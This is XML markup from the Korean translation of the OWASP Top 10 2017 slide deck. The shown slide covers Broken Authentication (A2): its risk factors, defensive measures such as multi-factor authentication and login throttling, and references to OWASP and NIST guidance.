              <a:rPr lang="ko-KR" altLang="en-US" sz="850" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>이 제대로 무효화 되지 않습니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="85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316" name="Shape 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474720" y="6400800"/>
            <a:ext cx="3383280" cy="27432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360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참조문서</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="14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lvl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buSzPct val="25000"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="300" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:cs typeface="Exo 2"/>
              <a:sym typeface="Exo 2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en-US" altLang="ko-KR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OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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OWASP Proactive Controls: Implement Identity and Authentication Controls</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" b="1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ASVS: V2 Authentication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V3 Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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OWASP Testing Guide: Identity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Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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OWASP Cheat Sheet: Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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OWASP Cheat Sheet: Credential Stuffing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2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OWASP 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Cheat Sheet: </a:t>
            </a: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Forgot Password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="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OWASP Cheat Sheet: Session Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="800" dirty="0">
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:hlinkClick r:id="rId15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OWASP Automated Threats Handbook</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="8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" action="ppaction://noaction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SzPct val="25000"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>외부자료</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="8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82800" marR="0" lvl="0" indent="-76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NIST 800-63b: 5.1.1 Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="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for thorough, modern, evidence based advice on authentication. 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CWE-287: Improper Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" marR="0" lvl="0" indent="-76450" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="111111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CWE-384: Session Fixation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474720" y="3142787"/>
            <a:ext cx="3383400" cy="3150000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="46800" tIns="72000" rIns="46800" bIns="3600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ko-KR" altLang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>보안 대책</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk2"/>
              </a:solidFill>
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="Exo 2"/>
              <a:sym typeface="Exo 2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="0" indent="-82800">
              <a:lnSpc>
                <a:spcPct val="111111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가능한 경우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다중인증을 구현하여 자동화된</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정 정보 삽입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무차별 공격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탈취된 계정 정보</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재사용 공격을 예방합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="86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특히 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>계정의 경우 기본 계정 정보를 사용하여 제공하거나 배포하지 마십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="86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비밀번호를 생성하거나 변경할 때 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>최악의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>Top 10000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId19"/>
              </a:rPr>
              <a:t>개 비밀번호</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 목록 이외로 설정하도록 하는 것과 같은 약한 비밀번호 검사를 구현하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="86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860" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>NIST 800-63 B's guidelines in section 5.1.1 for Memorized Secrets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 따라 암호 길이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복잡성 및 순환 정책 또는 다른 최신 정책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근거 기반 암호 정책을 조정합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="86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계정 열거공격에 대한 대비로 모든 결과에 대해 동일한 메시지를 사용하여 등록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계정 정보</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>복구</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>경로를 강화하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.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로그인 실패에 대한 제한이나 시간 연기를 하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>모든 실패에 대해 로그를 남기고 계정 정보 삽입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무차별 공격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다른 공격들이 탐지되면 관리자에게 알람이 오도록 설정하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82800" lvl="0" indent="-8280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860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>로그인 이후에 예측 불허한 무작위 세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>를 생성하는 서버 측의 안전한 내장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>세션 관리자를 사용하십시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>세션 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>에 없어야 하며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매우 안전하게 보관되어야 하고 로그아웃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="860" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>유휴 및 절대 시간 초과 이후 무효화되어야 합니다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="860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216000" rIns="91425" bIns="36000" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="-127000" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="7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2000"/>
              <a:t> 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1600" y="76199"/>
            <a:ext cx="5486400" cy="762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Exo 2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>취약한 인증</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="+mj-ea"/>
              <a:ea typeface="+mj-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="320" name="Shape 320"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1786778073"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="957600"/>
          <a:ext cx="6861600" cy="2186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0" marR="0" lvl="0" indent="-635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909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 가능성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endParaRPr lang="en-US" sz="1100" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FE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" marR="18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0000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US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확산 정도</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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0000"/>
                        <a:buFont typeface="Arial"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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탐지</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US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가능성</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="10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2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="12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endParaRPr lang="en-US" sz="1200" b="1" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FE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공격자는 자격 증명 자료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관리 계정 목록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자동화된 무차별 대입 및 사전 공격 툴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고급 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크래킹 툴을 통해 수억 개의 유효한 사용자명 및 암호 조합에 접근할 수 있습니다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세션 관리 공격은 특히 만료되지 않은 세션 토큰과 관련하여 잘 알려져 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="86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대부분의 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및 접근 제어의 설계와 구현으로 인해 취약한 인증이 광범위하게 나타납니다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세션 관리는 인증 및 접근 제어의 기반이며 모든 상태를 저장하는 애플리케이션에 있습니다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ko-KR" altLang="en-US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공격자는 수동으로 취약한 인증을 탐지하고 비밀번호 목록을 가진 툴과 사전 기반 공격으로 침투할 수 있습니다</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="9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22222"/>
                        <a:buNone/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" sz="9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공격자는 시스템을 손상시킬 수 있는 소수의 계정들이나 하나의 관리자 계정에만 접근하면 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애플리케이션의 도메인에 따라 돈세탁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사회 보장 사기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신원 도용이 허용되거나 법적으로 보호되어야 하는 기밀 정보가 공개될 수 있습니다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-31934" y="76199"/>
            <a:ext cx="1386600" cy="814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A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40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j-ea"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="Exo 2"/>
                <a:sym typeface="Exo 2"/>
              </a:rPr>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5892600" y="1554825"/>
            <a:ext cx="891000" cy="2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b="1" dirty="0"/>
              <a:t>비즈니스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="324" name="Shape 324"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1151400" y="1066810"/>
            <a:ext cx="655500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공격요인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="325" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3132599" y="1066800"/>
            <a:ext cx="791455" cy="3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보안 취약점</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16809" y="1066800"/>
            <a:ext cx="464100" cy="361500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="DFDEF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위협요소</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Placeholder 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="1295400" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="83276B"/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1800"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>A2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:rPr>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5579974" y="1160378"/>
            <a:ext cx="459315" cy="2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900" b="1" dirty="0"/>
              <a:t>영향</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Shape 303">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A11BA1-65DB-4781-A228-0B5CE2D7BC91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16808" y="1550200"/>
            <a:ext cx="981922" cy="218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700" b="1" dirty="0"/>
              <a:t>애플리케이션 특징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698897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13/2010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12102</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Letter 용지(8.5x11in)</PresentationFormat>
  <Paragraphs>1418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Exo 2</vt:lpstr>
      <vt:lpstr>Liberation Sans</vt:lpstr>
      <vt:lpstr>OpenSymbol</vt:lpstr>
      <vt:lpstr>맑은 고딕</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Wingdings 2</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>PowerPoint 프레젠테이션</vt:lpstr>
      <vt:lpstr>목차</vt:lpstr>
      <vt:lpstr>서문</vt:lpstr>
      <vt:lpstr>소개글</vt:lpstr>
      <vt:lpstr>릴리즈 노트</vt:lpstr>
      <vt:lpstr>애플리케이션 보안 위험</vt:lpstr>
      <vt:lpstr>OWASP Top 10 애플리케이션 보안 위험 – 2017 </vt:lpstr>
      <vt:lpstr>인젝션</vt:lpstr>
      <vt:lpstr>취약한 인증</vt:lpstr>
      <vt:lpstr>민감한 데이터 노출</vt:lpstr>
      <vt:lpstr>XML 외부 개체(XXE)</vt:lpstr>
      <vt:lpstr>취약한 접근 통제</vt:lpstr>
      <vt:lpstr>잘못된 보안 구성</vt:lpstr>
      <vt:lpstr>크로스 사이트 스크립팅 (XSS)</vt:lpstr>
      <vt:lpstr>안전하지 않은 역직렬화</vt:lpstr>
      <vt:lpstr>알려진 취약점이 있는 구성 요소 사용</vt:lpstr>
      <vt:lpstr>불충분한 로깅 및 모니터링</vt:lpstr>
      <vt:lpstr>개발자를 위한 다음 단계</vt:lpstr>
      <vt:lpstr>보안 테스터를 위한 다음 단계</vt:lpstr>
      <vt:lpstr>조직을 위한 다음 단계</vt:lpstr>
      <vt:lpstr>애플리케이션 관리자를 위한 다음 단계</vt:lpstr>
      <vt:lpstr>위험에 대한 참고 사항</vt:lpstr>
      <vt:lpstr>위험 요인에 대한 세부 정보</vt:lpstr>
      <vt:lpstr>방법론 및 데이터</vt:lpstr>
      <vt:lpstr>감사 인사</vt:lpstr>
      <vt:lpstr>감사 인사</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>OWASP and SecurityPlus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 Korean Translation</dc:title>
  <dc:subject>The Top 10 Most Critical Web Application Security Risks</dc:subject>
  <dc:creator>Andrew van der Stock;Neil Smithline;Torsten Gigler;Brian Glas</dc:creator>
  <cp:keywords>Web Application Security, Top 10, XSS, CSRF, SQL Injection</cp:keywords>
  <dc:description>OWASP TOP 10 2017 Korean Translation developed by SecurityPlus</dc:description>
  <cp:lastModifiedBy>Hyungkeun Park</cp:lastModifiedBy>
  <cp:revision>2400</cp:revision>
  <cp:lastPrinted>2017-11-16T20:35:31Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-08-17T12:51:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-12-04T07:29:53Z</dcterms:modified>
  <cp:category>Web Application Security</cp:category>
  <cp:contentStatus>Final Release</cp:contentStatus>
</cp:coreProperties>
</file>